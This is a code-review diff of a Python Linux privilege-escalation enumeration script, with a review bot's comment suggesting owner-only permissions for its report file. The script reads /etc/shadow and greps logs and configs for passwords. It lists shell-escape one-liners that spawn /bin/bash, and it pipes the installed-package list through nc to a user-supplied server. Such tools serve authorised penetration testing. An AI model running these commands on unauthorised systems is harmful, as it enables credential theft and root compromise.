skipped 56 lines 57 57 results = ['[-] failed: {}'.format(e)] 58 58 cmdDict[item]["results"]=results 59 59 60 - return cmdDict 60 + printResults(cmdDict) 61 61 62 62 # print results for each previously executed command, no return value 63 63 def printResults(cmdDict): skipped 8 lines 72 72 return 73 73 74 74 def writeResults(msg, results): 75 - f = open("privcheckout.txt", "a"); 75 + f = open("privcheckout.txt", "a") 76 76 f.write("[+] " + str(len(results)-1) + " " + msg) 77 77 for result in results: 78 78 if result.strip() != "": skipped 11 lines 90 90 "HOSTNAME":{"cmd":"hostname", "msg":"Hostname"} 91 91 } 92 92 93 - sysInfo = execCmd(sysInfo)94 - printResults(sysInfo) 93 + execCmd(sysInfo) 95 94 96 95 # Networking Info 97 96 skipped 7 lines 105 104 "SS":{"cmd":"ss -antup", "msg":"ss"} 106 105 } 107 106 108 - netInfo = execCmd(netInfo)109 - printResults(netInfo) 107 + execCmd(netInfo) 110 108 111 109 # File System Info 112 110 print( "[*] GETTING FILESYSTEM INFO...\n") skipped 2 lines 115 113 "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries"} 116 114 } 117 115 118 - driveInfo = execCmd(driveInfo)119 - printResults(driveInfo) 116 + execCmd(driveInfo) 120 117 121 118 # Scheduled Cron Jobs 122 119 cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs"}, 123 120 "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs"} 124 121 } 125 122 126 - cronInfo = execCmd(cronInfo)127 - printResults(cronInfo) 123 + execCmd(cronInfo) 128 124 129 125 # User Info 130 126 print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n") skipped 8 lines 139 135 "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity"} 140 136 } 141 137 142 - userInfo = execCmd(userInfo)143 - printResults(userInfo) 138 + execCmd(userInfo) 144 139 145 140 if "root" in userInfo["ID"]["results"][0]: 146 141 print("[!] 
ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n") skipped 8 lines 155 150 "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible"} 156 151 } 157 152 158 - fdPerms = execCmd(fdPerms) 159 - printResults(fdPerms) 153 + execCmd(fdPerms) 160 154 161 155 pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'"}, 162 156 "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'"}, 163 157 "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)"} 164 158 } 165 159 166 - pwdFiles = execCmd(pwdFiles)167 - printResults(pwdFiles) 160 + execCmd(pwdFiles) 168 161 169 162 # Processes and Applications 170 163 print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n") skipped 6 lines 177 170 getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes"}, 178 171 "PKGS":{"cmd":getPkgs, "msg":"Installed Packages"}} 179 172 180 - getAppProc = execCmd(getAppProc)181 - printResults(getAppProc) # comment to reduce output 173 + execCmd(getAppProc) 182 174 183 175 otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)"}, 184 176 "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules"}, 185 177 "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File"}} 186 178 187 - otherApps = execCmd(otherApps)188 - printResults(otherApps) 179 + execCmd(otherApps) 189 180 190 181 print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n") 191 182 skipped 41 lines 233 224 print("\n[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n") 234 225 235 226 devTools 
= {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools"}} 236 - devTools = execCmd(devTools)237 - printResults(devTools) 227 + execCmd(devTools) 238 228 239 229 print("[+] Related Shell Escape Sequences...\n") 240 - escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 230 + 231 + escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], 232 + "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], 233 + "perl":["perl -e 'exec \"/bin/bash\";'"], 234 + "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], 235 + "nmap":["--interactive"]} 236 + 241 237 for cmd in escapeCmd: 242 238 for result in devTools["TOOLS"]["results"]: 243 239 if cmd in result: skipped 7 lines 251 247 port = input("[?] What port is the server using? ") 252 248 print("[ ] Connecting to {}:{}".format(server,port)) 253 249 exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}} 254 - exploits_results = execCmd(exploits) 255 - printResults(exploits) 250 + execCmd(exploits) 256 251 257 252 print("\n[+] Finished") 258 253 print(bigline) skipped 1 lines
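Review bot: In `writeResults`, the touched line `f = open("privcheckout.txt", "a")` still creates the report under a fixed name in the current directory with default permissions, although the commands on this page include `cat /etc/shadow` and the password greps in `pwdFiles`, whose output presumably ends up in that file. Consider creating it owner-only and refusing symlinks, for example `fd = os.open("privcheckout.txt", os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o600)` followed by `with os.fdopen(fd, "a") as f:`, which also closes the handle on every path. The rest of `writeResults` and the file's imports are outside the visible lines, so confirm that `os` is imported and whether `f.close()` is already called later. Separately, `execCmd` now returns nothing and prints unconditionally; its header comment, which is outside the hunk, should say that callers read results from the dict mutated in place, as `userInfo["ID"]["results"][0]` does.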